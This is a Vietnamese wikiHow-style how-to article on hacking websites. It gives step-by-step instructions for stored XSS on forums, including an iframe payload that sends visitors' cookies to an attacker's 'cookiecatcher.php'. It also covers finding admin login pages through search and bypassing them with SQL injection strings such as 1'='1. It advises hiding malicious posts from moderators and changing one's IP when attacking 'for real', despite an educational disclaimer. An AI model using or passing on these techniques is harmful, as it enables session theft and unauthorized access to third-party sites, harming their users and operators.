Cách để Truy cập trái phép (Hack) website

Trong bài viết này:Sử dụng XSSTấn công bằng cách chèn mã độcTạo tiền đề để thành công

Làm thế nào để hack website? Dù hack mọi trang là không thể nhưng bạn hoàn toàn có thể truy cập trái phép vào những trang dễ tấn công, chẳng hạn như một diễn đàn. Trong bài viết này, wikiHow sẽ hướng dẫn bạn cách hack website thông qua khai thác lỗ hổng cross site scripting (XSS), các kỹ thuật tấn công bằng mã độc hại cũng như đưa ra một số lời khuyên để bạn có được sự chuẩn bị cần thiết cho thành công trong lĩnh vực này. Lưu ý: Bài viết này được viết hoàn toàn với mục đích giáo dục – nhằm giúp người đọc bắt đầu học về cách hack hợp pháp cũng như nhận biết cách thức làm việc của hacker để tự bảo vệ tốt hơn.

1
Sử dụng XSS

  1. 1
    Tìm một trang dễ tấn công cho phép bạn đăng tải nội dung, chẳng hạn như một diễn đàn nào đó. Lưu ý rằng phương pháp này không hiệu quả với những trang an toàn.
  2. 2
    Vào và đăng tải nội dung. Bạn sẽ phải nhập một số code (mã lập trình) đặc biệt vào phần “post” (Đăng) để thu thập toàn bộ dữ liệu của những người nhấp chuột vào nó.
    • Bạn nên kiểm tra xem liệu code này có bị lọc bởi hệ thống hay không. Hãy đăng
      <script>window.alert(“test”)</script>
      
      Nếu hộp cảnh báo xuất hiện khi bạn nhấp chuột vào bài đăng thì nghĩa là website đó không an toàn.
  3. 3
    Tạo và tải chương trình đánh chặn cookie của bạn. Mục đích của cuộc tấn công này là chiếm được cookie của người sử dụng, từ đó truy cập vào tài khoản trên các website có quy trình đăng nhập không an toàn. Lúc này, bạn cần chương trình đánh chặn cookie nhằm chiếm và chuyển hướng cookie của đối tượng mục tiêu. Hãy tải chương trình này lên website hỗ trợ php mà bạn có thể truy cập vào và tham khảo thêm về code của các chương trình đánh chặn.
  4. 4
    Đăng chương trình đánh chặn cookie của bạn. Nhập mã phù hợp vào bài đăng được dùng để chiếm cookie và gửi chúng về trang của bạn. Bạn nên nhập một số văn bản sau đoạn code để bài đăng bớt đáng ngờ và không bị xóa.
    • Chẳng hạn như bạn có thể dùng
      <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
  5. 5
    Sử dụng cookie thu thập được. Lúc này, bạn có thể sử dụng tùy ý thông tin cookie được lưu vào website của bạn.

2
Tấn công bằng cách chèn mã độc

  1. 1
    Tìm trang dễ tấn công. Bạn nên tìm những trang có lỗ hổng trong quy trình đăng nhập quản trị. Hãy thử tìm từ khóa admin login.asp trên Google.
  2. 2
    Đăng nhập với quyền quản trị. Dùng admin cho tên đăng nhập và thử một vài chuỗi ký tự khác nhau cho phần mật khẩu. Đó có thể là bất kỳ chuỗi nào, thường gặp có thể kể đến 1’, ’1’='1 hoặc 2'='2.
  3. 3
    Hãy kiên nhẫn. Nhiều khả năng bạn sẽ phải thử nhiều lần.
  4. 4
    Truy cập website. Với những trang dễ tấn công, rồi bạn cũng sẽ tìm được chuỗi ký tự cho phép bạn truy cập bằng quyền quản trị.

3
Tạo tiền đề để thành công

  1. 1
    Học một vài ngôn ngữ lập trình. Để hack một cách thực thụ, bạn cần hiểu cách thức hoạt động của máy tính và các công nghệ khác. Việc học cách sử dụng những ngôn ngữ lập trình như Python hay SQL sẽ giúp bạn có được kiểm soát tốt hơn với máy tính và nhận diện được điểm yếu bảo mật trong các hệ thống.
  2. 2
    Trang bị kiến thức HTML cơ bản. Bạn cũng cần hiểu sâu về html và javascript, đặc biệt là trong trường hợp bạn muốn hack các website. Dù việc học tiêu tốn thời gian nhưng có vô số cách để bạn có thể học miễn phí trên internet. Chỉ cần bạn muốn, cơ hội vẫn là của bạn.
  3. 3
    Tham khảo ý kiến “whitehat” - chuyên gia bảo mật máy tính. Họ là những hacker sử dụng khả năng của mình cho những mục tiêu tốt đẹp, khai thác lỗ hổng bảo mật và cải thiện môi trường internet cho tất cả mọi người. Nếu muốn học hack và sử dụng khả năng của mình một cách đúng đắn hay đơn giản là để bảo vệ website của mình thì bạn nên liên hệ và xin lời khuyên từ các chuyên gia này.
  4. 4
    Tìm hiểu về hack. Nếu muốn học cách hack hay tự bảo vệ mình, bạn sẽ phải nghiên cứu khá nhiều. Website có thể bị tấn công theo vô số cách khác nhau và danh sách này biến đổi mỗi ngày. Do đó, bạn sẽ phải không ngừng học hỏi.
  5. 5
    Cập nhật. Bởi kỹ thuật hack không ngừng thay đổi, bạn cần không ngừng cập nhật. Chỉ vì lúc này được bảo vệ trước một số loại hack nào đó không có nghĩa là trong tương lai, bạn vẫn an toàn!

Lời khuyên

  • Vào diễn đàn dành cho hacker để có được nhiều lời khuyên hữu ích.
  • Chỉ dẫn này được viết hoàn toàn vì mục tiêu giáo dục, với mong muốn giúp mọi người bắt đầu học hack một cách đúng đắn cũng như nhận biết cách thức làm việc của hacker để có thể tự bảo vệ tốt hơn.

Cảnh báo

  • Đọc xong bài này, bạn không thể trở thành hacker ngay. Bạn PHẢI trau dồi các kỹ năng và không ngừng luyện tập, luyện tập và luyện tập.
  • Nếu định hack thật sự, bạn nên đổi địa chỉ IP bằng các phần mềm sẵn có trên mạng.

Thông tin Bài viết

Chuyên mục: Bảo mật Máy tính

Ngôn ngữ khác:

English: Hack a Website, Español: hackear un sitio web, Italiano: Violare un Sito Web, Português: Hackear um Site, Русский: взломать веб–сайт, Deutsch: Eine Internetseite hacken, 中文: 入侵一个网站, Français: pirater un site Web, Bahasa Indonesia: Meretas Situs Web, Nederlands: Een website hacken, العربية: اختراق المواقع, ไทย: แฮกเว็บไซต์

Trang này đã được đọc 1.664 lần.
Bài viết này đã giúp ích cho bạn?